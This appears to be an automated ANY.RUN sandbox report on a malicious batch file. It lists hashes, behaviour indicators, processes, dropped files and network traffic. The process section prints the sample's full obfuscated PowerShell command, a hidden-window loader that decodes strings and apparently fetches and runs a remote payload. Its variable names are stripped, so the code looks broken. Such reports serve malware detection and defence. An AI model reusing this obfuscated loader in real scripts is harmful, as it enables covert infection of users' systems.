File name:

71495055c5c2f94dc782ef898fe46e8c3f33632b66f97d9cec5fc8591a6c98b0.bat

Full analysis: https://app.any.run/tasks/39827fa1-8b6b-4b9a-803e-da04bcba6a87
Verdict: Malicious activity
Analysis date: May 15, 2025, 13:33:23
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (6053), with no line terminators
MD5:

FDBAE2BFE61DE3B1F16AD48AAE430E17

SHA1:

0F8E6EB35AC71F83FEA365D1FE99055505464093

SHA256:

71495055C5C2F94DC782EF898FE46E8C3F33632B66F97D9CEC5FC8591A6C98B0

SSDEEP:

96:gjVGkWhs4pJh3LKv7Awb3DtENcKzoUMv2Op4KMrtYG5pzNQKyd85G5QdRrux:WVGk8s4vh7KvUwbRENcKX/KMrtYG7u8+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6036)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5776)

  • SUSPICIOUS

    • Suspicious use of asymmetric encryption in PowerShell

      • powershell.exe (PID: 6036)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6036)

    • Application launched itself

      • powershell.exe (PID: 6036)

    • Suspicious use of symmetric encryption in PowerShell

      • powershell.exe (PID: 6036)

  • INFO

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5776)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
130
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs sppextcomobj.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3008C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
5776"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "Get-Service;=[String](Get-Command A:).CommandType;Get-History;='Sanseindtryk';+=':';(ni -p -n Unfecund -value { param ();=4;do {+=[];+=5} until(![])});(ni -p -n Filefternavnet -value {param ();.() ()});ConvertTo-Html;=Unfecund 'Pingn Sn.eAntiTTo e.Astmw';+=Unfecund '.ctremo nBunteCFi hL lbeIPanteBjrgNJingT';=Unfecund 'RounMBanjosexbz uraiBetslK nklArboaMawn/';=Unfecund 'L,gnTHarplFlassInd,1 rso2';=' .nd[Lighn TraEBl.aT ad.UnciSAnimeTorsRI dsVKvinICoticSalvEVicipEmpaoSmugiD,agn.eklTSki mB sbaRi,oNCoroaEjecgM dseFinarEffr]Dek,:S mm: RegsNoduEUd.iCSekrUAmp rWag IAsseTOrgaypro PSubsRSc.por tttPhylOPseuC eliO FrilBogs= Con.issSC rasReinAOmstB udiEr rlArchiPrivTSelly';+=Unfecund ' Fre5Fina. Cau0St a Uk,u(PortWObjeiU.vunIndddSkitoCyt wLaunsGala Da aNSk,nTTuri orr1Udsi0Misg..ons0 Blo;Beln PrevWCrimiPrefnEeli6 .ri4Pa a;Karg LejexS lp6Hjde4Dunt;Ang ilr DamvPect:Fyr 1 Bri3 Unb7Vede.Unde0Tent) Ma. HornGKongeOverc Yngk PreoFici/Tol 2G.un0 O r1Prco0S er0 Ele1 Skr0 ev1Ka.p .croF iediIngrrPukeeKvajfForboE.trxtest/Nor.1Wick3 ,en7Dis .Poli0';=Unfecund 'unpiUB,esSExtie WitR Sep-OphoaSimugUmenEmam nTilgt';=Unfecund ' xpohUsmmt MegtLeddpKraks Bn :Afs./T,gg/SparqPhle- versrud tTasteTegneOutal ,te.Ins r,tiloMu i/PagaBcaprlSiamaRimet UndtTppeeCatcrBaaneDesidWind.Id opBdensNittd';=Unfecund 'La a>';=Unfecund 'GeroiMa,reNskex';='Navigatorisk';='\Jacamaralcyon.Tra';Filefternavnet (Unfecund 'Iron$ Famg.astlAtteOG idbKornAPeloLCirs:trylHQuaia Serw V,oc St UMikaB Fori tiltSpekeExp.=.ioc e: olaPrecPBussp.edsDu,esAUnlatgenuaAndi+N nr astpDispI GstLUsanfSkydg PanTIsbrEGartRTjuriC raENipsr');Filefternavnet (Unfecund '.odi agsLFinsONo.tbPrefaUnholHava:H poSL dok lorbnhriPlagVchroeMinibCaproDemoRLegudQuarSDortlSyt R prgdC ntoPostMAngeMKorte ramNSnad=zing RimMParcEGyl.l rouTSysteForsNStikD endESibyS Nve.PaadSSklmp CamLHnekI IncTe em(Panc yFMessiFrkklTiltmarkiaV.vlF TettCol,eAcq n reEOutgRE,kintrile A rsInca)');Filefternavnet (Unfecund );=[0];=(Unfecund ' Kok$ ptGOttelAxmaODramB nkiADi sLAfso: lacb hoaaUnf c riuK kosfDisfI Bl sSkppCO,alhUauteVolunTeniSundg=CreaNPanoEMnstWFre - HolononmbF,rpjS.enEBoreC StbTFirm UrosSBu,dY .ges BibtStreEUn,eMNu,l.Des ,frv Dage rinR TraNrvesaOpacLInteiBegyzRygee Burs');Filefternavnet ();Filefternavnet (Unfecund 'Nuch tec DiskEftefA.rsiA rssKaluc Myth Unwe P enJahvsEmba.FodeHUn oe Mena fled Ac,eGly,rOps s ass[Skin omnErh s RustMi diK rsfT ictDik.eM.rirTric] btt= loa,REnroeTartnO tsdPat iP rin Kupg');=Unfecund 'D,coDE sto Ko w NatnIntelFor o FolaI cid pgrFHyaliIdiolMorfe';=Unfecund 'Cran rrBNonaaHermcFascknathfs.naibregsSkracHalvhEsthe OolnUnprspala.Forb$ JorTBrokeSon rKremmVisoiweftnElekePre rRulle ,orn Rubd hoteChri.MisiIS ennDebuvYapno Nonk MedeNond(Cir. lUVervdEffesB.nemTraneT sslprobtMadeeMininNgtedB.tie Dk,sNon , Vol CendU.soaUnse)';=;Filefternavnet (Unfecund 'St,f$ UdsgAna lbahnOSystBLiv,aAarsl svr:UsagDSlukaOverSdenoSNormiSubaENon s F,r= ,ol( YeoT.isteLou sArbeTGema-TerrpS ndaSkilTMikrHUnda R.no aldUdvad seuaEm.g)');while (!) {Filefternavnet (Unfecund 'Lusk,aPasslFang: .ubB O.ou DetgT rpaHistb ForoTheooimprsAcuc2 Pr 0 ,ei2Sear=Curd$ harTcistjKobbeAcrinAc usste tB deg TilrKnsreAmeenBe vdSchee Bras') ;Filefternavnet ;Filefternavnet (Unfecund 'Radi[ ,aktSweaH IneR ,icE DisAHoveDProrISpirncresg Lys.forbTMeddh SprrTymoEundeAAnslDnonv]Nedv: Out:SammsUd kL ,rge SlaEGw.npSa k(pl j4 Pas0Unpe0Thu 0Stim)');Filefternavnet (Unfecund 'Bram Ha lFebeo alibSkndA InfLMalt: Katd Sk a CassGus S.orsiEpidESu eSUter=Besn(Frdit ValE IneS DecT.iba-PharpmobtAF,rmTFu.th Sti U ce SpaIBogkDUndedSpreABu.b)') ;Filefternavnet (Unfecund ' ei.aG ,enlRutiO BanBUkreaFil lC.rv:Jar FungrDRancS palE O,glBorgS SomKGruboNan.NSykuTFyriR FasODee,LRundLSkifETrepR ValnFadsEInfiS Und=Deno$ A,rgK epL S.joGlooB agaSnowLDemi: R fGo dia ailR smeD Na,eexcehSkunUpe.is ffjAskrurClimE indRRemm1 ,nr3 Sek0S,rr+,epp+Soeg%% Rhy CopkI.trrForeI eppVImitE niB koloTeewrSi pdJ niSGas,L FerR cu,DKaraoPrecMFol mStatEJ,ltNProt.FastCGerio Ek uTypen mpT') ;=[]}=399123;=31866;Filefternavnet (Unfecund 'M cl gConqlFr noSkadbS staPl gLApp :turrC Af OLaa NTilbFProlICleat KysEPrivoOrgirR bb Sten=Carm Ynk G UnheAr hT Kva-S.incforbOUnmynEn,rt,itrE Fenn ulltVing Flag SanDYnd a');Filefternavnet (Unfecund ' man,lFavro Zulb,olta S bl Ko :FlagLRivei Bord una Butt= Spa Dem [ AmpSProdyR,mnsCramtKamee ImpmLi,n.B syCSkatoEc on ellvUntoeCervr HaatSeks]Savl:.xoc:K,nsFSkvtrTallo SupmPrisBBu.sa F.rsZoogeRens6Anco4Cu rSaf.etTen,r t.yi NysnFljtgCoha( Mar lvo Trans.ldfFebrihjbotBunde nuoM,dhrUd,k)');Filefternavnet (Unfecund 'Conj FreoMaalBSumpaTraiLSola: Pa l TiteChalUSvark Ab oF,dbS To,E.tivSDupz Hypo=Di p Fonz[Con SFascYGlosS vertForte .somSed..TremT ToleCyanXSandtMul .Bygge SunnUphhCBuc oSkydDupstI ,irNStraGAn.p]Un.u: she:pag.AJak,s Delc TaxITel.i las.A itG ouneB.vaTArbeSAccoTQu nr Ud.ILektnRudeGJaco(Fo i Keri UtiD Mor)');Filefternavnet (Unfecund 'Pyro GirO SquBNonmAEgyplBid,: etrtBu.gePic M onaPFerreTranlHenlkRango Wh mSnydpNo,iLRygreGrd.kS mmsPrefemer R,onpSSnrk= tin to OpfsCakeeElsas ost.Checs aiuConfBS.ppSWeretr derRenniA caNObamGarbe(Adia,sB SplAVi.d, arq tanu OveaTilvl BogiBureTcrimeGallt stue HumnS mf)');Filefternavnet ;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\uxtheme.dll
6036"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\71495055c5c2f94dc782ef898fe46e8c3f33632b66f97d9cec5fc8591a6c98b0.bat.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6244\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
4 146
Read events
4 146
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
6036powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10e3f9.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
6036powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0jcrde4g.yjc.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5776powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nhuqjvww.gtn.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5776powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fc3eti1t.yke.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6036powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:D034A9FE410CC2700ED0D63A9970C905
SHA256:F25588F63595DFBC58448349ADB9AEE7F8439421C9E151FB4D8B64576197E97D
6036powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hqyi5hqu.owj.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6036powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PNHLGU38SLUZ3B756AB6.tempbinary
MD5:D034A9FE410CC2700ED0D63A9970C905
SHA256:F25588F63595DFBC58448349ADB9AEE7F8439421C9E151FB4D8B64576197E97D
5776powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:DE155EDBA893333E1781D73AED91303A
SHA256:F0B137B05B6F85BF2DBBC4584C696E8A94466CE608021BBCA7A54F10ECCEA24F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
13
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4932
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4932
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4
System
192.168.100.255:138
whitelisted
6544
svchost.exe
40.126.31.128:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:137
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.206
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.167
  • 23.48.23.177
  • 23.48.23.173
  • 23.48.23.145
  • 23.48.23.194
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 40.126.31.128
  • 20.190.159.75
  • 20.190.159.68
  • 40.126.31.0
  • 20.190.159.129
  • 20.190.159.73
  • 40.126.31.73
  • 20.190.159.131
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
nexusrules.officeapps.live.com
  • 52.111.229.43
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
71495055c5c2f94dc782ef898fe46e8c3f33632b66f97d9cec5fc8591a6c98b0.bat